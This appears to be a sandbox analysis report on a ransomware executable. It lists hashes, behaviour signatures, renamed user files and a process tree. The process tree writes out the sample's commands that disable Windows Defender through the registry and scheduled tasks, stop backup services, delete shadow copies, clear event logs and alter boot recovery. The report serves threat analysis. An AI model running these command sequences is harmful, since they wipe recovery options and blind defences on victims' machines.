Resubmissions
12-01-2022 19:42  220112-ye478adgd4  10
12-01-2022 19:26  220112-x5vwssdgej  10
12-01-2022 16:57  220112-vgqwtsdce7  10

Analysis
max time kernel: 125s
max time network: 120s
platform: windows7_x64
resource: win7-en-20211208
submitted: 12-01-2022 19:26
Static task: static1
Behavioral task: behavioral1
  Sample: 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
  Resource: win7-en-20211208
Behavioral task: behavioral2
  Sample: 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
  Resource: win10-en-20211208
General
Target: 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe
Size: 3.3MB
MD5: 257cd3ef7ac49a4b7942f7b61ca10b6c
SHA1: a0043163d33e25ba2a62c5061fd641c44807b492
SHA256: 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5
SHA512: bb9dded0fa261da418b3b0b14cfa72e4688f378bfe5814a0df45a01eb6d4b2ada6f56fb3151b75e6c8118dffd80e3e79c084befbcdfeeef851926e6faa4158db
Malware Config
Signatures
Deletes Windows Defender Definitions (2 TTPs, 1 IoCs)
Uses mpcmdrun utility to delete all AV definitions.
Processes:
  pid 2136  MpCmdRun.exe

Modifies security service (2 TTPs, 1 IoCs)
Processes:
  Set value (int)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"  reg.exe

Clears Windows event logs (1 TTPs)

Deletes shadow copies (2 TTPs)
Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTPs, 2 IoCs)
Processes:
  pid 2068  bcdedit.exe
  pid 2092  bcdedit.exe

Modifies extensions of user files (4 IoCs)
Ransomware generally changes the extension on encrypted files.
Processes (process column is 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe for every row):
  File renamed  C:\Users\Admin\Pictures\FormatSplit.crw => C:\Users\Admin\Pictures\FormatSplit.crw.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_y0Yyj3mi68I0.qyxdq
  File opened for modification  C:\Users\Admin\Pictures\FormatSplit.crw.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_y0Yyj3mi68I0.qyxdq
  File renamed  C:\Users\Admin\Pictures\SwitchConvert.raw => C:\Users\Admin\Pictures\SwitchConvert.raw.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_4snpvR4DHM40.qyxdq
  File opened for modification  C:\Users\Admin\Pictures\SwitchConvert.raw.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_4snpvR4DHM40.qyxdq

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Drops file in Program Files directory (64 IoCs)
Processes (description is "File opened for modification" and process is 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe for every row):
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\utilityfunctions.js.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_oDYgokwXKRs0.qyxdq
  C:\Program Files\Common Files\System\Ole DB\en-US\sqloledb.rll.mui
  C:\Program Files\Java\jre7\lib\zi\Indian\Cocos.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_e9DIb8GS6mY0.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR2B.GIF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Ptdu1DjGK0I0.qyxdq
  C:\Program Files (x86)\Windows Photo Viewer\en-US\ImagingDevices.exe.mui
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Goose_Bay.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_AV1sgaRVLgU0.qyxdq
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata_5.5.0.165303.jar.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_85BqdgNwcUM0.qyxdq
  C:\Program Files\Microsoft Games\SpiderSolitaire\fr-FR\SpiderSolitaire.exe.mui.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Hxp_u4Uchfs0.qyxdq
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861258748.profile.gz.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_6roHS_sox800.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382955.JPG.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_vtRKSrvHjXQ0.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00783_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_EFWCpoxO4iU0.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY01252_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_tQqfkvrePL80.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms5\ADD.GIF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_wdm3Ep4ptIs0.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.SG.XML.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_GvQ0SsrzfJI0.qyxdq
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-impl.xml.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_eho_I_i47cU0.qyxdq
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_zh_CN.jar.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_sa48YXAIosI0.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\1033\OLAPPTR.FAE.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_G0PldnZoY0Y0.qyxdq
  C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_qhfExihT4hU0.qyxdq
  C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\BRANDING.XML.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_N8dEHKcY-Ws0.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182898.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_fJGb6TlF9IY0.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\SplashImageMask.bmp.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Pj_Bfth3m9s0.qyxdq
  C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_BHNoPgrFGc00.qyxdq
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\LucidaBrightDemiBold.ttf.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_WKR3I7UKnP80.qyxdq
  C:\Program Files\Java\jre7\lib\zi\Asia\Ashgabat.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_seh_Z9SG0GQ0.qyxdq
  C:\Program Files\Microsoft Games\FreeCell\en-US\FreeCell.exe.mui.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_JErNanpgThY0.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00200_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_q3PBHC8iRRE0.qyxdq
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\css\currency.css
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-crescent.png
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099157.JPG.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_TspvXMIeL0k0.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_jdqOFlOLKhI0.qyxdq
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_3ug6sBrpVq80.qyxdq
  C:\Program Files (x86)\Common Files\microsoft shared\Stationery\HandPrints.jpg
  C:\Program Files\VideoLAN\VLC\lua\http\requests\vlm.xml.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Pp4FDHDNdrg0.qyxdq
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341554.JPG.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_bKJWOndWIio0.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\CharSetTable.chr.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_FQsEQwq7PM00.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_yfPew5aUoko0.qyxdq
  C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_PreComp_MATTE_PAL.wmv
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Prague.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_LesaNY3VuF00.qyxdq
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-execution_ja.jar.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_s0uXSGsb1D80.qyxdq
  C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\es-ES\js\picturePuzzle.js
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\alertIcon.png
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jmx_zh_CN.jar.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_TFvAXdvS_Q00.qyxdq
  C:\Program Files\Java\jre7\lib\zi\America\Toronto.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_vI4r7Zg1oiU0.qyxdq
  C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\de-DE\calendar.html
  C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\de-DE\settings.html
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00092_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_OXg66vZUSuU0.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\1033\PUB6INTL.REST.IDX_DLL.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_gNaPZfBCfHo0.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BZCARD11.POC.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_M6Kmrxzdb6U0.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01183_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_EM3vPo_5ZdM0.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099160.JPG.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_mGlnpXA3AFE0.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE03257_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Hgssa9KQ1dk0.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightYellow.css.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_kch-zAhd4Q80.qyxdq
  C:\Program Files\Java\jre7\lib\zi\America\Belize.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_UYnxZ1AXw980.qyxdq
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01139_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_2fGDcDFf7SA0.qyxdq
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Simferopol.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_KD925aoY2A40.qyxdq
  C:\Program Files\VideoLAN\VLC\locale\ja\LC_MESSAGES\vlc.mo.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_kXLCjsgLIvk0.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0237759.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_dFWidkz26rc0.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00478_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Lplx1klSQfM0.qyxdq
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SL00260_.WMF.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_VUMB6x4UCfo0.qyxdq
  C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.XML.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_K0Fy9a9lbxk0.qyxdq
  C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml.XtotxPmyrgzf4Hk9WO_m0JtvrbFizesNAumk7rEQFej_Z20_EkdHsAQ0.qyxdq
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.

Interacts with shadow copies (2 TTPs, 1 IoCs)
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
  pid 1588  vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (3 IoCs)
Processes:
  pid 2168  powershell.exe
  pid 2264  powershell.exe
  pid 1572  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe

Suspicious use of AdjustPrivilegeToken (64 IoCs)
Processes (each row: process, pid, tokens enabled in the order reported):
  wevtutil.exe pid 240: SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe pid 864: SeSecurityPrivilege, SeBackupPrivilege
  wevtutil.exe pid 1908: SeSecurityPrivilege, SeBackupPrivilege
  wmic.exe pid 1108: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  wmic.exe pid 584: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  wmic.exe pid 584 (second run of the same sequence, cut off at the 64-IoC limit): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
Suspicious use of WriteProcessMemory (64 IoCs)
Processes (each row: source PID wrote to memory of target PID, source process, target process, number of times reported):
  PID 1572 wrote to memory of 1796  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> net.exe  (3 times)
  PID 1796 wrote to memory of 576   net.exe -> net1.exe  (3 times)
  PID 1572 wrote to memory of 368   585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> net.exe  (3 times)
  PID 368 wrote to memory of 864    net.exe -> net1.exe  (3 times)
  PID 1572 wrote to memory of 1408  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> net.exe  (3 times)
  PID 1408 wrote to memory of 1584  net.exe -> net1.exe  (3 times)
  PID 1572 wrote to memory of 1388  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> net.exe  (3 times)
  PID 1388 wrote to memory of 1752  net.exe -> net1.exe  (3 times)
  PID 1572 wrote to memory of 1560  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> net.exe  (3 times)
  PID 1560 wrote to memory of 1448  net.exe -> net1.exe  (3 times)
  PID 1572 wrote to memory of 1836  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> net.exe  (3 times)
  PID 1836 wrote to memory of 1820  net.exe -> net1.exe  (3 times)
  PID 1572 wrote to memory of 1052  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> net.exe  (3 times)
  PID 1052 wrote to memory of 1816  net.exe -> net1.exe  (3 times)
  PID 1572 wrote to memory of 1524  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> net.exe  (3 times)
  PID 1524 wrote to memory of 1588  net.exe -> net1.exe  (3 times)
  PID 1572 wrote to memory of 996   585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> sc.exe  (3 times)
  PID 1572 wrote to memory of 1260  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> sc.exe  (3 times)
  PID 1572 wrote to memory of 1124  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> sc.exe  (3 times)
  PID 1572 wrote to memory of 1104  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> sc.exe  (3 times)
  PID 1572 wrote to memory of 908   585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> sc.exe  (3 times)
  PID 1572 wrote to memory of 1292  585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe -> sc.exe  (1 time, list cut off at the 64-IoC limit)
Processes (tree; [n] is the depth level, followed by PID, image path and command line)
[1] PID 1572  C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe  "C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe"
    - Modifies extensions of user files
    - Drops file in Program Files directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
  [2] PID 1796  C:\Windows\system32\net.exe  net.exe stop "NetMsmqActivator" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 576  C:\Windows\system32\net1.exe  C:\Windows\system32\net1 stop "NetMsmqActivator" /y
  [2] PID 368  C:\Windows\system32\net.exe  net.exe stop "SamSs" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 864  C:\Windows\system32\net1.exe  C:\Windows\system32\net1 stop "SamSs" /y
  [2] PID 1408  C:\Windows\system32\net.exe  net.exe stop "SDRSVC" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1584  C:\Windows\system32\net1.exe  C:\Windows\system32\net1 stop "SDRSVC" /y
  [2] PID 1388  C:\Windows\system32\net.exe  net.exe stop "SstpSvc" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1752  C:\Windows\system32\net1.exe  C:\Windows\system32\net1 stop "SstpSvc" /y
  [2] PID 1560  C:\Windows\system32\net.exe  net.exe stop "UI0Detect" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1448  C:\Windows\system32\net1.exe  C:\Windows\system32\net1 stop "UI0Detect" /y
  [2] PID 1836  C:\Windows\system32\net.exe  net.exe stop "VSS" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1820  C:\Windows\system32\net1.exe  C:\Windows\system32\net1 stop "VSS" /y
  [2] PID 1052  C:\Windows\system32\net.exe  net.exe stop "wbengine" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1816  C:\Windows\system32\net1.exe  C:\Windows\system32\net1 stop "wbengine" /y
  [2] PID 1524  C:\Windows\system32\net.exe  net.exe stop "WebClient" /y
      - Suspicious use of WriteProcessMemory
    [3] PID 1588  C:\Windows\system32\net1.exe  C:\Windows\system32\net1 stop "WebClient" /y
  [2] PID 996  C:\Windows\system32\sc.exe  sc.exe config "NetMsmqActivator" start= disabled
  [2] PID 1260  C:\Windows\system32\sc.exe  sc.exe config "SamSs" start= disabled
  [2] PID 1124  C:\Windows\system32\sc.exe  sc.exe config "SDRSVC" start= disabled
  [2] PID 1104  C:\Windows\system32\sc.exe  sc.exe config "SstpSvc" start= disabled
  [2] PID 908  C:\Windows\system32\sc.exe  sc.exe config "UI0Detect" start= disabled
  [2] PID 1292  C:\Windows\system32\sc.exe  sc.exe config "VSS" start= disabled
  [2] PID 1596  C:\Windows\system32\sc.exe  sc.exe config "wbengine" start= disabled
  [2] PID 1176  C:\Windows\system32\sc.exe  sc.exe config "WebClient" start= disabled
  [2] PID 1468  C:\Windows\system32\reg.exe  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 860  C:\Windows\system32\reg.exe  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  [2] PID 1584  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  [2] PID 644  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  [2] PID 820  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  [2] PID 1932  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  [2] PID 1140  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  [2] PID 1160  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  [2] PID 1540  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  [2] PID 1612  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  [2] PID 1464  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  [2] PID 1704  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  [2] PID 972  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  [2] PID 1484  C:\Windows\system32\reg.exe  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  [2] PID 1616  C:\Windows\system32\reg.exe  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] PID 668  C:\Windows\system32\reg.exe  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  [2] PID 560  C:\Windows\system32\schtasks.exe  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  [2] PID 1064  C:\Windows\system32\schtasks.exe  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  [2] PID 1608  C:\Windows\system32\schtasks.exe  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  [2] PID 1520  C:\Windows\system32\schtasks.exe  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  [2] PID 108  C:\Windows\system32\schtasks.exe  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  [2] PID 2044  C:\Windows\system32\reg.exe  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  [2] PID 1460  C:\Windows\system32\reg.exe  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  [2] PID 1600  C:\Windows\system32\reg.exe  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  [2] PID 892  C:\Windows\system32\reg.exe  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 544  C:\Windows\system32\reg.exe  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 1640  C:\Windows\system32\reg.exe  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  [2] PID 1832  C:\Windows\system32\reg.exe  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 1508  C:\Windows\system32\reg.exe  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 924  C:\Windows\system32\reg.exe  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  [2] PID 1692  C:\Windows\system32\reg.exe  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\system32\reg.exe  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
- Modifies security service
PID:536 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1648
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1588 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:240 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:584 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2068 -
